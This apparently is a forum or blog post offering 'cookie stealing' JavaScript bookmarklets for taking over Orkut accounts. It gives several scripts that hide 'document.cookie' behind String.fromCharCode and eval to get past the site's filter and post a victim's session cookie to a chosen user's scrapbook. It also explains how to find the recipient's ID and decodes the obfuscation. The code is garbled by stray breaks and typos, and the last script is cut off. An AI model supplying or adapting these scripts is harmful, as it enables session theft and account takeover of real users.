This is the cookie stealing script that help you in hacking any Orkut Account : java script:nobody=replyForm;nobody.toUserId.value=xxxxxxx;nobody.scrapText.va lue=eva (String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105 ,101)); obody.action=’Scrapbook.aspx?Action.writeScrapBasic’;nobody.submit();void (); At the place of xxxxxxx you need to put the Google-ID (GID) of the person to whose profile the cookies will be sent. To know the GID, right click on any person’s profile picture (in main profile, or in scrapbook or in community posts or anywhere), and click to save image. The save window will open giving the image file name as (1234567).jpg. This number (1234567) or whatever it is, is the GID. Sometime the name of the image will appear as b.jpg, then you should select some other pic. — However, you can just use search “ToUserID” in Orkut Search (menu option) and you would get many instances of this being distributed. Just believe me guys open ur orkut search and type ToUserID ans see the wondering Results……… java script:nobody=replyForm;nobody.toUserId.value=xxxxxxx;nobody.scrapText.va lue=eva (String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105 ,101)); obody.action=’Scrapbook.aspx?Action.writeScrapBasic’;nobody.submit();void (); Could be. See those numbers? Let’s see what they mean: 100, d 111, o 99, c 117, u 109, m 101, e 110, n 116, t 46, . 99, c 111, o 111, o 107, k 105, i 101 e
�This is how you must read the content of a cookie: var theCookie=”"+document.cookie; eval() is a function, which will execute a code represented by a string,which is in this case masked behind the numbers. Quite clever, but the first time I have seen trics like this. I can already imagine how the orkut solved the problem previously. They just forbid the string “document.cookie” in users code which solved the problem at first, but obviously that doesn’t solve this issue. So again, this is not a bug within Firefox, that is very much normal Javascript code and Firefox executes it just the way it is expected to be executed. If there is a security bug somewhere, it is either in the specifications of the Javascript or at the orkut website. In this case I would blame orkut. But Orkut’s Abobe Script is not working so here are some of the JavaScripts which is working F9 New cookie stealing script on orkut java script:orkut=replyForm;orkut.toUserId.value=xxxxxxxx;orkut.scrapText.valu e=eval( tring.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,1 01));or ut.action=’Scrapbook.aspx?Action.submit’;orkut.submit();java script:cor=new Array(’u',’b',’i',’u');var z=1;txt=document.getElementsByTagName(’textarea’)[0];txt.value=txt.value. rep ace(/(.)/gi,”§$1?);txt.value=txt.value.replace(/\§ /gi,” “);for(y=0;y